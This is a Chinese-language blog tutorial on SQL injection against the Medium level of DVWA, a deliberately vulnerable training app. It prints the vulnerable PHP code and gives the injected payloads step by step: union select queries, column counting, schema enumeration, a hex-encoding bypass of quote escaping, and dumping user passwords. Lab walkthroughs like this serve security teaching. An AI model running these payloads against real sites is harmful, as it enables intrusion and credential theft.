滲透測試之DVWA的Medium級別的SQL注入

Medium SQL Injection Source是通過一個下拉表的方式提交數據的。選擇數據後提交，發現URL不是GET注入，是把提交的數據存放到post數據中

先把源代碼放出來

<?php
 
if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];
	$id = mysql_real_escape_string( $id );
 
	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
 
	// Get results
	$num = mysql_numrows( $result );
	$i   = 0;
	while( $i < $num ) {
		// Display values
		$first = mysql_result( $result, $i, "first_name" );
		$last  = mysql_result( $result, $i, "last_name" );
 
		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
 
		// Increase loop count
		$i++;
	}
 
	//mysql_close();
}
 
?>

可以看到，Medium級別的代碼利用mysql_real_escape_string函數對特殊符號\x00,\n,\r,\,’,”,\x1a進行轉義，同時前端頁面設置了下拉選擇表單，希望以此來控制用戶的輸入。

我們可以用hackbar或者用burpsuite抓包試一下。

一：Hack Bar

1、添加post數據如下 ,點擊POST

2、我們可以在這裏添加註入語句：id=3 union select 1,database()#&Submit=Submit。獲得當前數據庫爲dvwa，再用LOW級別手工注入同樣的方法獲取其他數據庫信息。

二：BurpSuite

這裏我說一下代理工具Proxy SwitchyOmega，可以輕鬆快捷地管理和切換多個代理設置。BurpSuite抓包改參數，提交惡意構造的查詢參數。
1.判斷是否存在注入，注入是字符型還是數字型
抓包更改參數id爲2' or 1=1 #，報錯。也可以右鍵Send to Repeater發送到Repeater,在Repeater模擬瀏覽器訪問，成功了再改。

抓包更改參數id爲2 or 1=1 #，查詢成功。

說明存在數字型注入。由於是數字型注入，服務器端的mysql_real_escape_string函數就形同虛設了，因爲數字型注入並不需要藉助引號。

2、猜解SQL查詢語句中的字段數。抓包更改參數id爲2 order by 2 #，查詢成功。抓包更改參數id爲2 order by 3 #，報錯。

說明執行的SQL查詢語句中只有兩個字段，即這裏的First name、Surname。

3、確定顯示的字段順序。抓包更改參數id爲2 union select 1,2 #，查詢成功。

4、獲取當前數據庫。抓包更改參數id爲2 union select 1,database() #，查詢成功。

5、獲取數據庫中的表。抓包更改參數id爲2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，查詢成功。

一共有兩個表，guestbook與users。

6、獲取表中的字段名。抓包更改參數id爲2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#，查詢失敗。

這是因爲單引號被轉義了，變成了\'。可以利用16進制進行繞過，抓包更改參數id爲1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #，查詢成功。

說明users表中有8個字段，分別是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

7、下載數據。抓包修改參數id爲1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查詢成功。

滲透測試之DVWA的Medium級別的SQL注入

Python練手例子

Python 獲取動態加載的頁面數據

在Window下安裝Oracle

SQL server 2008 r2 安裝圖文詳解(轉)

滲透之CMS

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結